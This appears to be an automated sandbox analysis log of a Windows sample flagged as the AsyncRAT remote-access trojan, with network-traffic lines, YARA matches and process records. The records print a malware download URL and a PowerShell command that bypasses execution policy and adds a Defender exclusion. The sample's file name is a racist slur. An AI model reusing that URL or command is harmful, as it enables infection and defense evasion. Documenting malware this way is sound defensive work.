          Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
          Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
          Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
          Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
          Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
          Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
          Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
          Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
          Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
          Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
          Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
          Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
          Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
          Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
          Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
          Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
          Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
          Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
          Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
          Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
          Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
          Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
          Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
          Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
          Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
          Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
          Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49741 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49742 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.4:49743 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.4:49749 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.4:49750 version: TLS 1.2

          Key, Mouse, Clipboard, Microphone and Screen Capturing

          barindex
          Source: Unconfirmed 610443.crdownload.0.dr, XLogger.cs.Net Code: KeyboardLayout
          Source: chromecache_49.2.dr, XLogger.cs.Net Code: KeyboardLayout

          System Summary

          barindex
          Source: sslproxydump.pcap, type: PCAPMatched rule: Detects AsyncRAT Author: ditekSHen
          Source: 00000008.00000000.2482762861.0000000000F72000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
          Source: dropped/chromecache_49, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
          Source: C:\Users\user\Downloads\Unconfirmed 610443.crdownload, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
          Source: sslproxydump.pcap, type: PCAPMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
          Source: 00000008.00000000.2482762861.0000000000F72000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
          Source: dropped/chromecache_49, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
          Source: C:\Users\user\Downloads\Unconfirmed 610443.crdownload, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
          Source: Unconfirmed 610443.crdownload.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
          Source: Unconfirmed 610443.crdownload.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
          Source: Unconfirmed 610443.crdownload.0.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
          Source: chromecache_49.2.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
          Source: chromecache_49.2.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
          Source: chromecache_49.2.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
          Source: chromecache_49.2.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: chromecache_49.2.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: Unconfirmed 610443.crdownload.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: Unconfirmed 610443.crdownload.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: classification engineClassification label: mal100.troj.spyw.evad.win@23/9@6/4
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\Downloads\03afebb4-1e94-48dd-9dbf-ebade9e1330d.tmpJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6452:120:WilError_03
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeMutant created: \Sessions\1\BaseNamedObjects\qrHUH9z9nk81LG5x
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ckvnfmyb.uhl.ps1Jump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1976,i,9986206320547753570,420349288583730614,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://ser0xen.com/sucklemydicknigger.exe"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4872 --field-trial-handle=1976,i,9986206320547753570,420349288583730614,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Source: unknownProcess created: C:\Users\user\Downloads\sucklemydicknigger.exe "C:\Users\user\Downloads\sucklemydicknigger.exe"
          Source: C:\Users\user\Downloads\sucklemydicknigger.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Downloads\sucklemydicknigger.exe'
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1976,i,9986206320547753570,420349288583730614,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
